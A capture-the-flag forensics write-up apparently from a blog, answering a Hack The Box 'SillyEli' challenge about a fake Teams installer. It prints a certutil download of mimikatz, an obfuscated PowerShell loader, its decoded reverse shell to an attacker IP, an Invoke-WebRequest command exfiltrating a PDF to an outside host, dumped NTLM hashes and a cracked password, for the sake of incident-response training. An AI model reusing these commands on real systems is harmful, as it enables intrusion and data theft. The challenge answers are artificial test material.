April 8, 2026

SillyEli Writeup

Writeup for the hard DFIR sherlock SillyEli

  • writeup
  • forensics
  • hackthebox

Introduction

Eli, a recent addition to the IT team, is eager to settle into his new role. Due to the company’s flexible “Bring Your Own Device” (BYOD) policy, which applies to everyone except IT administrators, Eli receives a newly prepared PC from Metushelah, the senior IT administrator, as part of the IT team’s secure device protocol. Eli’s first priority is to install essential applications that will enable him to connect seamlessly with the rest of the team. He begins setting up the system and downloading the necessary software. After a few days on the job, Eli starts noticing something unusual: every so often, a PowerShell window flashes on his screen, disappearing almost instantly, too quickly to read any of its contents. Assuming it’s just a minor glitch, Eli continues with his work. However, as the unexpected PowerShell pop-ups persist, Eli decides to consult Metushelah. Metushelah suspects these PowerShell flashes could indicate malicious activity. To ensure there are no security breaches, he conducts a forensic acquisition of Eli’s PC and forwards it to the Incident Response team for further analysis. Now, as a member of the IR team, your mission is to investigate Eli’s workstation.

Walkthrough

Task 1 - Identify the specific time the malware was downloaded in UTC.

To find downloaded files we can open the places.sqlite file created by firefox and look in the moz_annos table, where we can see only one downloaded file, which is TeamsSetup.exe. This table has a columns called dateAdded which is the time the file was downloaded in microseconds, so we need to convert it to a human readable format. The value in the dateAdded column for the downloaded file is 1730858274151000, which converts to 2024-11-06 01:57:54.

Answer: 2024-11-06 01:57:54

Task 2 - Which domain name was the file downloaded from?

In the same file we can look at the table moz_places, where we can see that TeamsSetup.exe was downloaded from the domain filesuneedtodownload.s3.eu-north-1.amazonaws.com

Answer: filesuneedtodownload.s3.eu-north-1.amazonaws.com

Task 3 - Identify the SHA-1 hash of the malware.

Open the amcache.hve file and look for TeamsSetup.exe and we find the SHA1: de733beed85f39605fcdea42dddee190506424f2

Answer: de733beed85f39605fcdea42dddee190506424f2

Task 4 - It looks like malicious tool attempts to download a secondary tool during execution — find and provide the full URL.

When Microsoft Defender detects a potential threat, it generates a log in C\ProgramData\Microsoft\Windows Defender\Support. In this folder we find the file MPDetection-20241029-115405.log, which contains the line: 2024-11-06T01:58:15.202 DETECTION Trojan:Win32/Ceprolad.A CmdLine:C:\Windows\System32\certutil.exe -urlcache -split -f https://github.com/gentilkiwi/mimikatz/archive/refs/heads/master.zip C:\Users\Eli\Documents\Mimikatz.zip

Answer: https://github.com/gentilkiwi/mimikatz/archive/refs/heads/master.zip

Task 5 - What is the name of the batch file created on the system as part of the malware execution?

Open USN Journal and look for .bat files within the timeframe of what we see above. We find a file called TeamsUpdater.bat, which was ran at 2024-11-06T01:58:14Z

Answer: TeamsUpdater.bat

Task 6 - What was the runtime duration of the malware? (Duration in Ms)

The SRUM stores information about how long application were running for: Located in C:\Windows\System32\sru\SRUDB.dat, we can analyze this file with srum_dump.exe, which gives us an xlsx file where we can find TeamsSetup.exe with a runtime of 60003 ms.

Answer: 60003 ms

Task 7 - Locate the local URL cache and identify the full URL the threat actor used to download an additional tool during the attack. Include the complete URL with filename and extension.

In CryptNetUrlCache we can find some URLS for downloads when the file is a signed file. We can analyze the CryptNetUrlCache with a tool called CryptNetUrlCacheParser.py (https://github.com/AbdulRhmanAlfaifi/CryptnetURLCacheParser) and from there we can easily find the URL since there is only one entry that looks suspicious: https://filebin.net/archive/0rkhisv2iq4slveo/kape.zip

Answer: https://filebin.net/archive/0rkhisv2iq4slveo/kape.zip

Task 8 - What is the name of the scheduled task that the attacker created for persistence?

Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree and find we will find a task called TeamsUpdater.

Answer: TeamsUpdater

Task 9 - What is the unique GUID associated with the malicious scheduled task?

Same location as previous task we can see GUID: {A4F7ED3E-E7CD-4539-8E79-D73B568FC298}

Answer: {A4F7ED3E-E7CD-4539-8E79-D73B568FC298}

Task 10 - Identify the process or command executed by the malicious scheduled task.

In the same file using the GUID we can find the command executed under: Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{A4F7ED3E-E7CD-4539-8E79-D73B568FC298}, which is found as: AwAMAAAAQQB1AHQAaABvAHIAZmYAAAAAHAAAAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQC2AAAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAEUAbABpAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABUAGUAYQBtAHMALgBwAHMAMQAAAAAAAAA=. Decode this and we get powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Eli\AppData\Local\Temp\Teams.ps1

Answer: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Eli\AppData\Local\Temp\Teams.ps1

Task 11 - Identify the attacker’s IP address and port.

If we open the analyzed MFT and search for Teams.ps1 we can find the file and see that it is only 599 bytes big, which usually means its stored directly in the MFT. We can also see that the EntryNumber of the file is 315567, whch we can use to extract the file: .\MFTECmd.exe -f 'SillyEli\Acquisition\C\$MFT' --de 315567:

(NEW-obJECT SYSTem.Io.StreAmReADEr( ( NEW-obJECT  iO.ComPrEsSiOn.DEFlateStReam( [iO.memoRysTREAm][sYsTEM.coNvERT]::FROMbasE64stRiNg( 'TY9Ra8JAEITfC/0Py3EtdzQeiVHbGiy0oYhQtDRCHyTQJC56rYnibVBR/3svaVr6sMdyzHwzy00+EGPctSbpJ2YE0cEQ5mqMpKJ19oVk1DR8DVcaCxLMu28rr3enPP/WTps5nY4vpRoiRbTFJBcymKUHwlkc85RgAK5SvW7X756uju452C31CoXgesBNrt4wmQsrc1zHvuoFiwUtpYRWgeDKY8DnFvC/2xT3pB6jcDR6LrL1XBeL32i7NiTgWgaXFzw9bBJjLIDVBma/1iVtyqqU0LgHS28/XHtwgklJrR+GhBtgHwUDqza1ckZVJjZxcb/fgOvgJ3upEQ1XVp5cvW81obBuB6oy5u+u8zc=') ,[iO.CoMPreSSiOn.CompressioNmODe]::deCoMPRess) ), [systEm.text.EnCOdIng]::ascII) ).ReaDTOend() | Ie

Decompressing this gives us:

$sm=(New-Object System.Net.Sockets.TCPClient("192.168.137.132",443)).GetStream();[byte[]]$bt = 0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d = (New-Object Text.ASCIIEncoding).GetString($bt,0, $i);
$bypass = "ASCII"
$output = (iex $d 2>&1 | Out-String) + "`n"
$st = ([text.encoding]::$bypass).GetBytes($output)
$sm.Write($st, 0, $st.Length)}

The answer therefore is: 192.168.137.132:443

Answer: 192.168.137.132:443

Task 12 - What is the name of the sensitive file exfiltrated by the threat actor?

If we look in Eli’s powershell history logs we find the command: Invoke-WebRequest -Uri "http://91.240.118.162:8080/" -Method Post -InFile "C:\Users\Eli\Documents\Employees_Contact_Info.pdf" -ContentType "application/octet-stream";, which gives us the file.

Answer: Employees_Contact_Info.pdf

Task 13 - Based on the contents of the document, what is Metushelah’s email address?

The Windows Search Index indexes most files on the system, including the Employees_Contact_Info.pdf file. This is stored in C\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb. If we open this file with ESEDatabaseView and go to the table SystemIndex_ProperyyStore and search for the file name Employees_Contact_Info.pdf we can find the column 4625-System_Search_AutoSummary, which contains the email of Metushelah [email protected]. To read more about this: https://www.sans.org/presentations/windows-search-index-the-forensic-artifact-you-ve-been-searching-for

Answer: [email protected]

Task 14 - At what time did the attacker clear the Windows event logs? (in UTC)

When the event logs gets cleared an event in the Security event log with event ID 1102 gets generates. This was generated at 2024-11-06 02:16:50

Answer: 2024-11-06 02:16:50 UTC

Task 15 - What is the name of the legitimate tool used by the threat actor to acquire the SAM and SYSTEM hives?

If we go to the Public user and go to the Downloads folder we find a folder called KAPE and a folder called Registry so the tool ran is KAPE.

Answer: KAPE

Task 16 - Identify the password belonging to Eli’s account that were exfiltrated by the attacker to their C2 server.

To extract the password we can use Impacket’s secretsdump on the SYSTEM and SAM file and we get:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d9a2192b83449ffb92ddd5ad93144b43:::
Eli:1001:aad3b435b51404eeaad3b435b51404ee:4494236c3843cdc39ce068871bed96e0:::
Metushelah:1002:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::

These are NTLM hashes, and the actual password part is only the last part of the hash, for for Eli the password hash is 4494236c3843cdc39ce068871bed96e0. Putting this into crackstation.net gives the password: blackrose

Answer: blackrose